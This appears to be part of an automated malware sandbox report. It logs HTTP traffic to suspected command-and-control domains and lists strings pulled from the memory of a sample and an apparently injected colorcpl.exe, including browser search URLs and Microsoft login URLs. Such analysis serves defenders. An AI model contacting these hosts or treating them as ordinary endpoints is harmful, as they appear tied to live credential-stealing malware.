Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:28:07 GMTServer: ApacheLast-Modified: Wed, 30 Oct 2024 18:34:18 GMTETag: "49d-625b5f32466a6"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:28:10 GMTServer: ApacheLast-Modified: Wed, 30 Oct 2024 18:34:18 GMTETag: "49d-625b5f32466a6"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:28:29 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:28:32 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:28:34 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:28:37 GMTServer: Apache/2.4.62 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:28:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtOpCwyehXoIXy1FVgwGym%2F2vXk2v7yXR4wLy2d9CLw8Saum5vZDI%2FdU%2FKIBpDpVHSaT%2BShHWMUPtjJN1NjDdnj4ZZP9IkvvGjBhsAu2SnKa0YAXze5qgymz8Xef77MupJKdovq09dM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8db29e089b744768-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1905&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:28:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sg5Hakm8o66qk7UEfdmIuUv5j8%2FFGetbZs%2BVFQNHxNTVerJ0rDKHMXmqTmziwKbyk5hCelsGt%2BWylfqTe%2FN5B%2FI2Z1nS23mVVAsG2O3XJi4NvwOGcBK2Wmw6oRZJzmRqPPgPkl6JEBI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8db29e18889ee9ce-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1090&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(bY<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:28:56 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpg4hFaN%2FymN5chz8DbJoUR%2Fjxz3HHHeUOv6y6Sk2CscH%2BC5thizAlJF6StLKu21DAYyXNBi00qqkdyvJZSUYBC1zeufwlbnvbBq1MxA08aZRuDLRW6KANkwkYlPZ9nCLbnYC2VDphE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8db29e28bd76cb76-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1574&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1768&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:28:59 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R4WskpB4gzjhxF%2FwLimhq3Hc0Eg%2BVCEikYc%2FyYJ%2BvKvf3iwbo7nDGQOCwkSWrukp1XQwGvpQEVldEgAJ3b0RbWODV4PO7et5MSLsYkdwqy8%2FfW9Mlz0oIwRCKcYOlEgE5EpZxLYYxCQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8db29e3b3b4aeaa4-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1090&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=462&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>10

Source: colorcpl.exe, 00000007.00000002.4473670706.000000000617A000.00000004.10000000.00040000.00000000.sdmp, tWcBthnLrDi.exe, 00000008.00000002.4472994884.0000000003C6A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: colorcpl.exe, 00000007.00000002.4473670706.0000000005E56000.00000004.10000000.00040000.00000000.sdmp, tWcBthnLrDi.exe, 00000008.00000002.4472994884.0000000003946000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://meanttobebroken.org/9g6s/?1Zgl=l/X
Source: 18in SPA-198-2024.exe	String found in binary or memory: http://tempuri.org/Gamee.xsd7PoisonRoulette.GameResource
Source: tWcBthnLrDi.exe, 00000008.00000002.4474644674.0000000005867000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.timizoasisey.shop
Source: tWcBthnLrDi.exe, 00000008.00000002.4474644674.0000000005867000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.timizoasisey.shop/3p0l/
Source: colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: colorcpl.exe, 00000007.00000003.2443067407.00000000086E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: colorcpl.exe, 00000007.00000002.4471538704.00000000033EB000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4471538704.000000000340A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: colorcpl.exe, 00000007.00000002.4471538704.000000000340A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
